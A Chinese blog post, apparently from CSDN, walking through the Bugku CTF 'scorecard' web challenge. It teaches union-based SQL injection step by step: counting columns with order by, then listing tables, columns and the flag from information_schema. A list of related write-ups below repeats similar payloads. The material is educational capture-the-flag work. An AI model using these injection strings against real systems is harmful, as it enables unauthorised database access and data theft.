CTF之Bugku 成绩单

最新推荐文章于 2022-04-13 00:42:17 发布
最新推荐文章于 2022-04-13 00:42:17 发布
阅读量263 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_41607190/article/details/102905623
版权
本文深入解析SQL注入原理,演示如何利用SQL注入获取数据库信息,包括数据库名称、表名及字段名,通过具体实例展示了group_concat(), database()等函数的使用方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这道题很久之前就看到过了,现在才弄明白。。。
这么输入有回显
在这里插入图片描述

在这里插入图片描述
这么输入就没有了,为什么呢
当我们用查询语句

select * from emp
order by x

假如emp这个表的字段有10个,那么x的值就只能是1-10
如果超过10,就不回显
所以说明显示只有4列,并没有隐藏什么

接下来就是爆库、爆表、包字段了
在这里插入图片描述
数据库叫skctf_flag,database()函数可以返回当前的数据库名
然后爆表

' union select 1,group_concat(TABLE_NAME),3,4 from information_schema.TABLES 
where TABLE_SCHEMA='skctf_flag'#

在这里插入图片描述
解释一下,我们用的数据库除了我们存放的信息,还有数据库(mysql、oracle)自带的库,叫information_schema库,里面有一些自带的表,如上面用到的TABLES表,有两个字段,一个叫TABLE_NAME,一个叫TABLE_SCHEMA,分别存放表名和这个表所属的库。

group_concat()函数功能是把一列的内容全部输出,像我们爆表的时候就爆了两个还有个叫sc的表

详细可以看看这个博客写的东西
https://blog.youkuaiyun.com/kikajack/article/details/80065753

现在爆出表,叫fl4g,爆字段

' union select 1,group_concat(COLUMN_NAME),3,4 from information_schema.COLUMNS 
where TABLE_NAME='fl4g'#

在这里插入图片描述名字竟然一样。。爆数据

' union select 1,skctf_flag,3,4 from fl4g#

在这里插入图片描述
完结

BugkuCTF成绩单(web)
s0il的博客
04-02 831
题目描述: 让人看上去就是SQL注入。 提交一下,出现三列属性,flag就应该在这里面: 手动注入: 在表单中输入1或者1#或者1--或者1++等返回正常,输入1'返回异常 库名、表名、字段名的获取: 联合查询 id=-1' union select 1,2,3,4# 之后返回: 或者执行-1' orde...
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 2175
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
BugkuCTF 成绩单
3tu6b0rn的博客
04-02 1196
可以看出应该为sql联合注入 SQL注入之联合查询注入 要求查询列数相同,其中有Name、Math、 English、Chinese 一共四个数据,因此需要select 1,2,3,4 构造语句 id=0' union select 1,2,3,4# 查询数据库 id=0' union select 1,2,3,database()#找到数据库 skctf_flag 查询数据表id=0...
MySQL的information_schema数据库
简单即美
09-07 1171
摘自http://www.cnitman.com/mysql-information_schema-explain/;可对照参考文档来理解,http://dev.mysql.com/doc/refman/5.1/en/information-schema.html 大家在安
Bugku CTF-web17 成绩单
weixin_44023403的博客
05-15 397
Bugku CTF-web17成绩单前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy
BugkuCTF-web-成绩单 WP
会下雪的晴天
07-12 1741
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 个人收获:最基本的SQL注入 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 题目描述 解题传送门:http://123.206.87.240:8002/chengjidan/ 解题思路 查看源...
成绩单
WYJ____的博客
08-15 517
0' union select 1,2,3,4# 0' union select 1,database(),3,4#    0' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='skctf_flag'# 0' union select 1...
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
最新发布
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
Bugku-web之成绩查询
weixin_42939822的博客
03-14 3565
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
BugkuCTF-web-成绩单 writeup
kuller_Yan的博客
03-26 475
记一次简单的SQL注入 题目传送门,点击即走 首先分析题目:进入题目网页就可以看到这个 遇到表单,当然要填一填,看看有什么变化。于是我根据题目提示输入1。仔细观察可以发现输入1,并且返回后,出现了龙龙龙的成绩单以及四份数据。 于是打开hackbar,post提交 正常返回,加 ’ 测试一下 啥也不是,再加个 # 又正常了。 那么基本可以认定是SQL注入无疑了。 两种解题方法: 1:手...
bugkuctf 成绩单
舞动的獾
06-20 771
bugkuctf成绩单 用hackbar插件的post对它进行测试,之前测试了出现人的成绩单,所以测试4,或者更高. id=1' order by 5# 没有回显,所以试试4 id=1' order by 4# 所以可以知道有四列 尝试联合查询 记得把前面的查询数据置空,写成id=0即可,显示正常,说明确确实实存在这四列数据 id=0' union select 1,2,3,4 # ...
bugku 成绩单详解
qq_35811830的博客
01-26 1325
bugku 成绩单详解 首先打开查询成绩的页面 在火狐浏览器下使用hackbar插件对页面进行post请求,分别依次输入id=1,2,3,4 当你这样去试了之后,就会发现当输入id=1,2,3,的时候分别有三个孩子的成绩,但是当id=4的时候,成绩单里面的成绩又为空了。 因此我们可以猜测数据库里面一共是有四列的 然后在此处利用内置函数database()爆破获取数据库的名字。 至于为什么使用u...
ctf-web-成绩查询
god_001的博客
04-13 1272
题目: 打开网页: 一个提交页面,按提示输入1,2,3能够得到三个成绩单表格:如1时: 查看源代码: 发现,表单使用post方式提交,并且name="id" 猜测使用SQL注入 首先检测闭合方式: 分别post id=1' id=1" 发现post id=1"时,正常,post id=1'时无响应 应该是单引号 ' ' 闭合 再通过order by查询当前表列数: 于是可以判断...
BugkuCTF之web题之成绩单
A_dmin的博客
12-07 6289
BugkuCTF之web题之成绩单 1.向其中分别输入1,2,3…发现可以查询,当向其中输入1’时,程序不能查询,根据观察题目,猜测应该可以大概判断出有四个字段 2.在成绩查询处开始爆数据库名,输入0’ union select database(),2,3,4 # 得到: 说明数据库的名为skctf_flag 3.在成绩查询处开始爆数据库表名,输入0’ union select table_...
bugku 成绩单 总结
DreamHigh
08-28 3030
试题地址: http://40.125.170.89:49164/index.php 成绩查询     龙龙龙的成绩单 Math English Chinese 60 60 70 方法一:常规方法 进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显 于是 就开始爆破吧 通过id=-1...
BugKu学生成绩查询 详解 SQL注入
布屿
05-18 2133
根据测试,源代码伪代码如下: <?php //链接数据库 mysql_connet("[datebase]","[user]","[password]") or //检查错误,处理无法访问数据库的情况 die("Could not connect:" . mysql_error()); //选择数据库 mysql_select_db("[database_name]"); //从POS...
BugkuCTF【部分web】
taozijun的博客
09-27 1040
web基础$_POST 这个很简单,hackbar就可以做,但是只能用hackbar做吗? 如果网页原本没有输入框给你输入数据,并在后台设置提交方法为post,那么你就无法主动向一个网站post一个数据(dalao会构造post表单例外)。有什么方法可以简单地向一个网页主动去post一个数据呢? 但....我没找到(因为包不一样所以抓包改包软件也没什么用)。只能说在chrome可以用post...
【Python】成绩等级判断
点滴记忆
01-11 5102
score=eval(input("请输入成绩:\n")) if score>=60: grade="D" elif score>=70: grade="C" elif score>=80: grade="B" elif score>=90: grade="A" else:grade="E" print("输入的成绩属于级别{}"...
bugku 成绩查询
Superpig的博客
11-10 2445
分析 典型的sql联合注入,用bp进行爆破。 step1: 联合注入要求查询列数相同,姓名、语数外一共四个数据,因此select 1,2,3,4 令id=a’是为了使前一个查询无效而回显第二个查询(也可以使用其他字符,只要保证union前的查询无效即可) id=a' union select 1,2,3,4# step2:查询数据库名 id=a' union select 1,2,3,datab...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值